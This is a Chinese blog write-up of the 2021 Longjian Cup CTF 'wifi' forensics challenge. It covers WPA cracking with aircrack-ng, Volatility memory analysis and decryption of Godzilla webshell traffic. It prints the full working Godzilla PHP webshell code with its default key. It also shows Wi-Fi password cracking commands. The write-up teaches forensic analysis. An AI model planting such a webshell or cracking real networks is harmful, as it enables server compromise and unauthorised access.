[陇剑杯 2021]wifi WP

于 2024-08-13 20:26:07 发布
阅读量384 收藏 8
点赞数 15
分类专栏: CTF MISC 文章标签: android 流量分析 无限流量分析 CTF MISC
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_68483928/article/details/141172816
版权
CTF 同时被 2 个专栏收录
4 篇文章 3 订阅
订阅专栏
MISC
4 篇文章 2 订阅
订阅专栏

9.1小王往upload-labs上传木马后进行了cat /flag,flag内容为_____________。(压缩包里有解压密码的提示,需要额外添加花括号)

附件信息:
在这里插入图片描述

拿到附件

先看服务器.pcapng

可以发现只有发出去的包,且为哥斯拉php_eval_xor_base64流量

在这里插入图片描述

哥斯拉php_eval_xor_base64流量是3.0才更新的php连接方式,其目的是为了支持普通的一句话eval($_POST[1])。不过其本质就是利用pass参数传了一个php_xor_base64哥斯拉马罢了,所以流量特征和php_xor_base64类似。

https://www.freebuf.com/sectool/285693.html

这篇文章很好的分析了哥斯拉的特征和解密方法。

这里由于只有Request,我们的目的是获取cat /flag的内容,肯定在返回包里,所以解密Request没意义,只要记下密码pass,密钥key均为哥斯拉默认的即可。

在这里插入图片描述

J(”DMI	
ÌýÀÕ:KsPDÉC'¤
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
$pass='key';
$payloadName='payload';
$key='3c6e0b8a9c15224a';
if (isset($_POST[$pass])){
    $data=encode(base64_decode($_POST[$pass]),$key);
    if (isset($_SESSION[$payloadName])){
        $payload=encode($_SESSION[$payloadName],$key);
        eval($payload);
        echo substr(md5($pass.$key),0,16);
        echo base64_encode(encode(@run($data),$key));
        echo substr(md5($pass.$key),16);
    }else{
        if (stripos($data,"getBasicsInfo")!==false){
            $_SESSION[$payloadName]=encode($data,$key);
        }
    }
}
yÚyÙkº÷«®Ûv‡wŽž±¦åj÷²Æ©

$key = 3c6e0b8a9c15224a

然后我们分析客户端.cap

在这里插入图片描述

是无线局域网的流量,而且我们发现SSID为

My_Wifi

这里的SSID我们还可以使用aircrack-ng 来查看

aircrack-ng 客户端.cap

在这里插入图片描述

WPA的密码我们尝试使用airdecap-ng来爆破密码

aircrack-ng 客户端.cap -w ../../../CTF/directionary/WPA-dirc/common.txt

当然字典爆破都试过了,没有找到密码,我们想到附件中还有一个内存镜像。我们

最后分析Windows 7-dde00fa9.vmem,还是找文件

这里我们主要是找WPA的密码

vol -f Windows\ 7-dde00fa9.vmem --profile=Win7SP1x86_23418 filescan | grep -E -i "zip|txt|rar|7z|gz|doc|png|jpg"

我们看到有用的信息就给它dump下来

最后发现My_Wifi.zip是一个加密文件

使用Windows中的压缩文件管理工具我们可以发现,下方有个提示:密码是网络适配器的GUID

在这里插入图片描述

那么什么是GUID呢?我们去网上搜索什么是GUID,Windows如何查看GUID

在Windows的注册表中的这个路径存放着GUID。

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4d36e972-e325-11ce-bfc1-08002be10318}

或者我们通过命令查看本地的GUID格式

getmac /V /S 127.0.0.1

GUID的格式通常是一串包含字母和数字的长字符,类似于**{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}**。

同样我们也可以根据这个GUID查找在注册表中的位置

这种com格式字符串很有可能在windows文件系统或者注册表中,在自己电脑上搜一下。

在这里插入图片描述

那么在内存取证工具volatility中用Interfaces关键字去定位

在这里插入图片描述

然后找到网络适配器的GUID。接着使用GUID 去解密压缩包

在这里插入图片描述

找到了无线流量的密码

然后我们使用airdecap-ng去解密无线流量

airdecap-ng 客户端.cap -p 233@114514_qwe -e My_Wifi -o 客户端_decode_.cap

在这里插入图片描述

我们接着去分析解密之后的哥斯拉流量

前后各16位的md5,中间夹着base64异或流量,典型的哥斯拉特征。和之前的服务器发起包对应起来了

在这里插入图片描述

我们跟踪到最后一个http流量包里面的内容就是flag

在这里插入图片描述

使用解密脚本,并注意删除前后混淆的16位md5值

在这里插入图片描述

Eileen Seligman
关注
  • 15
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2021陇剑杯部分wp
hezhing
11-03 1231
2021陇剑杯 全是流量分析。麻了。只做了一部分。 参考链接 陇剑杯 个人 ’WriteUp‘-魔法少女雪殇 (snowywar.top) 陇剑杯Writeup(部分) - 惊觉 (leheavengame.com) 1.签到 题目描述: 网关小王在上网途中发现自己的网络访问异常缓慢,于是对网络出口捕获了流量,请您分析流量后进行回答: 1.1:     #### 题目:     此时正在进行的可能是http 协议的网络攻击。
2021陇剑杯线下赛题目
04-10
守护数字安全,构建清朗空间!首届“陇剑杯”网络安全大赛,全国首次“以防为主”的网络安全大赛。
陇剑杯2021部分wp
5L2g556F5ZWl77yf
09-15 1646
赛后看了别的师傅的wp在此复现,做个笔记好好学习。 文章目录签到1.1jwt2.12.22.32.42.52.6webshell3.13.23.33.43.53.63.7日志分析4.14.24.3内存分析6.16.2简单日志分析7.17.27.3sql注入8.18.28.3 签到 1.1 http jwt 2.1 jwt 2.2 黑客绕过验证使用的jwt中,id和username是______。(中间使用#号隔开,例如1#admin) JWT 主要由三部分组成,每部分 用 . 分割
2021陇剑杯部分WP
Y-Y-K的博客
09-15 4943
写在前面的话,结局排名离谱,最后两分钟直接掉了70多名,排出100以外…很久没有打比赛了,但是也没想到国内的CTF环境已经差到这种地步了,另外就是题目都挺好,个别的题目暂时这里不给出解题过程,见谅 签到 操作内容: 看请求包,http请求返回403 Jwt 操作内容: 看cookie,jwt格式 找个在线解jwt的网站,将cookie解码,注意不要解登录失败那个,解登陆成功的 看流量包。alert(“root”) wireshark打开,包序号103 109这两个包,将文件都试下 包序号109,用echo
[陇剑杯 2021]之Misc篇(NSSCTF)刷题记录⑤
Aluxian_的博客
04-26 2016
[陇剑杯 2021]之Misc篇(NSSCTF)刷题记录⑤
2021陇剑杯网络安全大赛wp-JWT部分(详细题解)
偷一个月亮
09-15 7881
2021陇剑杯网络安全大赛-JWT部分(详细题解) 2.1 token特征 eyJ 2.2 2.3 2.4 2.5 2.6
首届“陇剑杯”网络安全大赛wp-WIFI部分(详细题解)
偷一个月亮
09-16 1742
首届“陇剑杯”网络安全大赛wpwifi) author:Neg00 题目介绍: 网管小王最近喜欢上了ctf网络安全竞赛,他使用“哥斯拉”木马来玩玩upload-labs,并且保存了内存镜像、wifi流量和服务器流量,让您来分析后作答:(本题仅1小问) 附件下载 https://share.weiyun.com/0kEM1pm5 下载文件解压得到三个文件 镜像分析 发现一个压缩包文件,提取出来分析 题目出现提示,密码是网卡的GUID password is Network Adapter G
首届“陇剑杯”网络安全大赛(部分WP)
weixin_46245411的博客
09-15 5517
浅谈~ 博主当成一次个人赛玩玩,没想到这次比赛的赛题类型还是很新颖的,基本都是MISC类型的题目 我这里上传了题目在百度云上,希望UU们手下留情~别让它爆了陇剑杯题目(提取码:vuno) 话不多说,直接上题解!! 1.1 使用wireshark打开其中的“Good.pcapng”流量包 发现有HTTP包,直接过滤HTTP包,再结合题目给出的提示,没有发现dns、ftp包,所以判断出是http协议攻击: 所以选择“http”协议的网络攻击 2.1 使用wireshark.
2021陇剑杯(真流量分析与取证杯)题目复现
Love&Share
09-15 2440
JWT 看session很明显使用了jwt id和username需要去解jwt就可以得到 坑点:不要只看前半部分迷惑流量 没有的到权限所以说这部分流量可以忽略,往后翻 这条流量权限就变成了root,所以这个session才是正确的 解出来id=10087 username=admin 文件就是1.c 编译恶意文件名为looter.so文件,在后边的流量中也是可以看到的 修改的配置文件 SQL注入 附件是access.log日志文件,里边就是sql注入-布尔盲注的数据包 前边的不用看 172.17
首届“陇剑杯”网络安全大赛_wifi
weixin_72667582的博客
08-06 675
原题如下:网管小王最近喜欢上了ctf网络安全竞赛,他使用“哥斯拉”木引进玩玩upload-labs ,并且保存了内存镜像、 wifi和服务器流量,让您来分析后作答:(本题仅1小问) 小王往upload-labs上传木马后进行了cat /flag,flag内容为__。
UNCTF2021 部分wp.pdf
12-10
UNCTF2021 部分 WP 解题报告 本文档对 UNCTF2021 部分 WP 进行了详细的解题报告,涵盖了 WEB、PHP、MYSQL、CRYPTO 等方面的知识点。 1. Fuzz_md5Get 和 Post 传参绕过 在 UNCTF2021 的 WEB 部分中,我们遇到了一...
2021年指挥官杯能源互联网主动防御安全技能大赛晋级赛真题 wp 解题思路
08-17
2021年指挥官杯能源互联网主动防御安全技能大赛晋级赛真题 WP 解题思路 本资源为2021年指挥官杯能源互联网主动防御安全技能大赛晋级赛真题的 WP 解题思路,涵盖了四个题目,分别为蓝01-取证、蓝02-取证、蓝03-取证...
红帽杯wp红帽杯wp
05-06
红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp红帽杯wp
2021年“绿城杯”网络安全大赛
09-30
2021年“绿城杯”网络安全大赛是一场聚焦网络安全技术的竞技活动,旨在提升参赛者在信息安全领域的专业技能,增强社会对网络安全的重视。CTF(Capture The Flag)是网络安全竞赛的一种形式,参赛团队通过解决一系列...
android compose 设置 padding 和 margin
阿饱同学
08-08 262
在 Jetpack Compose 中,是一个非常灵活的布局工具。要在中设置padding和margin,需要分别使用padding修饰符和中的margin参数。
[论文翻译] LTAChecker:利用注意力时态网络基于 Dalvik 操作码序列的轻量级安卓恶意软件检测
my991201的博客
08-08 790
Android 应用程序已成为黑客攻击的主要目标。安卓恶意软件检测是一项关键技术,对保障网络安全和阻止异常情况至关重要。然而,传统的静态分析难以分析新的恶意应用程序,而动态分析则需要更多的系统资源。我们提出了一种基于注意力时态网络的新型轻量级安卓恶意软件深度学习检测框架。本研究深入研究了安卓恶意软件的 Dalvik 操作码序列,采用 N-gram 算法分割序列并提取上下文信息特征。然后,利用 LSTM 和 TCN 算法捕捉长期依赖关系和局部特征,从而全面理解 Dalvik 操作码序列中的时间信息。
thinkphp漏洞之sql注入漏洞-builder处漏洞
最新发布
banliyaoguai的博客
08-09 481
这个代码中上面第一个红框将data数组中遍历,然后val中就是data的值,然后看第二个红框三个不同的参数对应不同的处理方式,这三个处理方式都可以进行注入,但是insert方法中会对exp进行过滤如果数据中存在 exp ,则会被替换成 exp空格,所以三种处理方式中选项等于exp的无法使用。这里是接收一个get传参,然后username/a的意思是有username传参username的值就是传参的值没有的话就是默认是a。看一下他的insert这个函数,数据传输是自己写的值。方法来分析并处理数据。
【vulnhub】Wakanda :1靶机
wbplife的博客
08-07 614
lang=fr表示语言为法语,可以设置成中文,英语等语言,既然这个lang可以改变语言,那么说明改变语言使用了语言php文件,那么关联的就是文件包含漏洞了,页面没什么可以下手的地方,那我们就构造url,这里就关联到一个知识点,也是我们要用到的:php://filter.它是php中一个独有的协议,它作为一个中间流来处理其流,比如我们可以将我们手上的源码用base64解码来dowm下来.创建一个恶意setup.py并上传到tmp目录,和上面的方法一样,创建文件,并远程下载到/tmp目录下面。
2021陇剑杯线下赛 wp
09-02
2021陇剑杯线下赛wp指的是该比赛的胜利方案(Winning Proposal)。这个问题的答案取决于具体的比赛和题目,因此我无法提供具体的场景和情况。不过,我可以向你介绍一些常见的比赛wp示例,帮助你理解wp的含义。 通常,比赛wp是指参赛者提出的在比赛中胜出的最佳方案。这种方案可能涉及各种因素,包括创新性、技术实施、解决问题的方法和效率等。具体来说,一个好的wp可能包括以下几个要素: 1. 题目分析:清晰理解比赛的题目和要求,明确问题的关键点和目标。 2. 解决方案:提出独特、创新和可行的解决方案,展示自己的技术和专业知识。 3. 实施计划:描述实施该方案的详细步骤和时间表,包括资源的分配和团队协作。 4. 风险分析:识别潜在的风险和挑战,并提供解决方法和备选方案。 5. 评估指标:明确关键的评估指标和成功的标准,展示方案的效果和可衡量的结果。 在许多比赛中,评委会或专家小组会对参赛者提交的wp进行评审,选出最佳的方案。一个优秀的wp将会体现出创新性、可行性和适应性。并且,一个优秀的方案通常能够提供有说服力的理由来解释为什么这个方案是最好的,以及为什么它比其他方案更优秀。 总的来说,2021陇剑杯线下赛wp是指在比赛中成功的方案,这个方案提供了创新、可行和有效的解决问题的方法,并且能够清晰地展示其技术和团队的能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值